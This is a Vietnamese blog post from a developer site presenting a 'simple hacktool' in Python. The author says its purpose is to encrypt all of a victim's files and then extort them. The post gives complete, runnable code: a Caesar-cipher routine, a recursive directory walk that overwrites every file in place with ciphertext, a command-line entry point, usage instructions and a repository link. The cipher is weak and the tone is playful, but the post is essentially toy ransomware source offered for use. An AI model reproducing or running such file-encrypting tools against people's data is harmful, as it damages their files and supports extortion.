Simple hacktools with Python - Làm giàu không khó
Python
74
Encrypt
1
White

Rice viết ngày 21/12/2018

Mục tiêu

Mình muốn làm một cái tool xinh xắn đáng yêu với mục đích mã hóa toàn bộ file của victim, sau đó tống tiền bắt cóc :smile:

Chọn cipher:

Vì đây là một tool đơn giản để nghịch chơi nên mình chọn Caesar Cipher¹ để dễ làm.

Giải thích một cách đơn giản thì Cipher này sẽ dịch chuyển kí tự theo key.

Ví dụ: key = 1 thì a -> b, b -> c etc.

Encrypt text:

def encrypt(plaintext, key):
  cyphertext = ''
  for character in plaintext:
    if character.isalpha():
      number = ord(character)
      number += key%26
      if character.isupper():
        if number > ord('Z'):
          number -= 26
        elif number < ord('A'):
          number += 26
      elif character.islower():
        if number > ord('z'):
          number -= 26
        elif number < ord('a'):
          number += 26
      character = chr(number)
    cyphertext += character
  return cyphertext

Encrypt file:

def caesar(input_file, key):
  text = open(input_file,'r',encoding="utf8").read()
  output_file = open(input_file, 'w', encoding= "utf-8")
  cyphertext = encrypt(text, key)
  output_file.write(cyphertext)

Get File from directory:

def get_file(path):
  files = []
  for r, d, f in os.walk(path):
    for file in f:
      files.append(os.path.join(r, file))
  return files

Main:

if __name__ == '__main__':
  try:
    path = sys.argv[1]
    key = int(sys.argv[2])
    for file in get_file(path):
      caesar(file,key)
  except Exception as e:
    print("Something's wrong! Check your input again!\nError: ")
    print(e)

Wait ...

Để thêm một chút màu mè, mình sẽ thêm progress bar để đếm thời gian của tasks và cũng nhìn ... ngầu hơn :smile:

#Refactor caesar
def caesar(input_file, key):
  text = open(input_file,'r',encoding="utf8").read()
  output_file = open(input_file, 'w', encoding= "utf-8")
  for k in tqdm(range(1)): #Which will make progress bả
    print("") #Make color purpose
  cyphertext = encrypt(text, key)
  output_file.write(cyphertext)

Final

The original file:

The unhealthy swamp advertises. The aardvark detaches the model platform behind a misuse. 
The worst impairs the crossed resident inside the backbone. A second lecture retracts across a hotel.

The encrypt file:

Ftq gztqmxftk eimyb mphqdfueqe. Ftq mmdphmdw pqfmotqe ftq yapqx bxmfrady nqtuzp m yuegeq. 
Ftq iadef uybmude ftq odaeeqp dqeupqzf uzeupq ftq nmownazq. M eqoazp xqofgdq dqfdmofe modaee m tafqx.

Usage:

Requirements: tqdm library - pip install tqdm | pip install -r requirements.txt
Notes: Nếu bạn không muốn chạy progress bar và cũng không muốn tải tqdm library thì refactor lại def caesar. Xóa vòng lặp đi là được.
Command: python SimpleHackTools.py Directory_Address Key_Number
Example: python SimpleHackTools.py TestEnCrypt 1000

Github: ~> https://github.com/PhiHuyHoang/SimplePythonHacktool

Have Fun! :smile:

References:

1: https://vi.wikipedia.org/wiki/M%E1%BA%ADt_m%C3%A3_Caesar

Bình luận


White
{{ comment.user.name }}
Bỏ hay Hay
{{comment.like_count}}
Male avatar
{{ comment_error }}
Hủy
   

Hiển thị thử

Chỉnh sửa

White

Rice

17 bài viết.
44 người follow
Kipalog
{{userFollowed ? 'Following' : 'Follow'}}
Cùng một tác giả
White
17 8
Sản phẩm sau khi làm http://coffeetube.herokuapp.com/ Yêu cầu Nói chung thì giờ download nhạc từ youtube thì nó có vô số cách rồi. Nhưng tự mình...
Rice viết hơn 2 năm trước
17 8
White
9 5
Trước giờ logic code của mình vẫn luôn dễ dãi như gái làng chơi nên đôi khi nó đã support thêm cho mình cái đức tính càng lúc càng không (thèm) kiê...
Rice viết hơn 2 năm trước
9 5
White
7 7
Description Mình là một thằng thích đọc sách. Nhưng lúc nào cũng bận (lười) nên cũng mấy tháng rồi chưa hoàn thành được quyển sách nào. Mình đa số...
Rice viết 2 năm trước
7 7
Bài viết liên quan
White
7 7
Description Mình là một thằng thích đọc sách. Nhưng lúc nào cũng bận (lười) nên cũng mấy tháng rồi chưa hoàn thành được quyển sách nào. Mình đa số...
Rice viết 2 năm trước
7 7
{{like_count}}

kipalog

{{ comment_count }}

bình luận

{{liked ? "Đã kipalog" : "Kipalog"}}


White
{{userFollowed ? 'Following' : 'Follow'}}
17 bài viết.
44 người follow

 Đầu mục bài viết

Vẫn còn nữa! x

Kipalog vẫn còn rất nhiều bài viết hay và chủ đề thú vị chờ bạn khám phá!